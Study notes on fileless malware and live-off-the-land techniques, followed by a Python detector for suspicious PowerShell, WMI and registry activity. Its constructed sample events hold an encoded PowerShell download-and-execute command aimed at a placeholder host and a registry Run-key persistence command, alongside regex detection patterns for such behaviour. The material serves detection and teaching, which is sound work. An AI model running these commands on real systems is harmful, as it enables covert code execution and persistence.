Fileless Malware
- fileless malware has gained prominence
- not a definitive classification
- describes common behaviors and techniques:
  - does not write code to disk
  - uses memory-resident techniques to:
    - run in its own process
    - run within a host process or dynamic link library (DLL)
    - run within a scripting host
  - but does have some disk activity
    - may change registry values to achieve persistence
    - initial execution may depend on the user running a script, file attachment, or trojan package
  - uses lightweight shellcode to achieve a backdoor mechanism on the host
    - shellcode is easy to recompile in an obfuscated form to evade detection by scanners
    - able to download additional packages or payloads to achieve objectives
  - may use "live off the land" techniques rather than compiled executables to evade detection
    - means that the malware code uses legitimate system scripting tools to execute payload actions
      - e.g., PowerShell and Windows Management Instrumentation (WMI)
    - if executed with sufficient permissions, these environments provide all the tools needed to perform scanning, reconfigure settings, and exfiltrate data
- advanced persistent threat (APT) and advanced volatile threat (AVT) can be used to describe fileless/live off the land malware
  - can be classified as low-observable characteristic (LOC)
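As an added example (not part of these notes), a small Python detector that applies the behaviors listed above to constructed process-creation records: it flags hidden or encoded PowerShell, decodes an -EncodedCommand payload so the obfuscated command can be inspected, and catches WMI process creation and registry Run-key persistence. The record field names, the rule set and the sample events are assumptions.

```python
"""Flag live-off-the-land process launches in constructed process-creation events (field names assumed)."""
import base64
import re

# Rules for the behaviors the notes describe: PowerShell run hidden or with an encoded command,
# a download executed straight in memory, WMI spawning processes, and registry Run-key persistence.
RULES = {
    "ps_encoded": re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s", re.I),
    "ps_hidden": re.compile(r"powershell(\.exe)?.*\s-w(indowstyle)?\s+hidden", re.I),
    "download_exec": re.compile(r"(iex|invoke-expression).*(downloadstring|webclient)", re.I),
    "wmi_process_create": re.compile(r"wmic(\.exe)?\s+.*process\s+call\s+create", re.I),
    "registry_run_persist": re.compile(r"reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I),
}
ENC_ARG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}  # typical initial-execution parents
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or '' if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def detect_lotl(events):
    """Return {pid: sorted rule names} for every event that matches at least one rule."""
    hits = {}
    for ev in events:
        reasons = [n for n, rx in RULES.items() if rx.search(ev["cmdline"])]
        # Obfuscation hides the payload from plain string matching, so scan the decoded form too.
        decoded = decode_encoded_command(ev["cmdline"])
        reasons += ["decoded:" + n for n, rx in RULES.items() if rx.search(decoded)]
        if ev["parent"].lower() in OFFICE and ev["image"].lower() in SCRIPT_HOSTS:
            reasons.append("office_spawned_script_host")
        if reasons:
            hits[ev["pid"]] = sorted(reasons)
    return hits

# Constructed sample events, not real telemetry; the URL is a placeholder.
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"pid": 102, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + ENC_PAYLOAD},
    {"pid": 103, "parent": "cmd.exe", "image": "wmic.exe", "cmdline": 'wmic.exe process call create "notepad.exe"'},
    {"pid": 104, "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\u.vbs"},
]
```

Running `detect_lotl(SAMPLE_EVENTS)` reports each sample pid with the rule names it tripped, including the rule that only fires on the decoded PowerShell payload.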
Advanced Persistent Threat (APT) is an attacker’s ability to obtain, maintain, and diversify access to network systems using exploits and malware.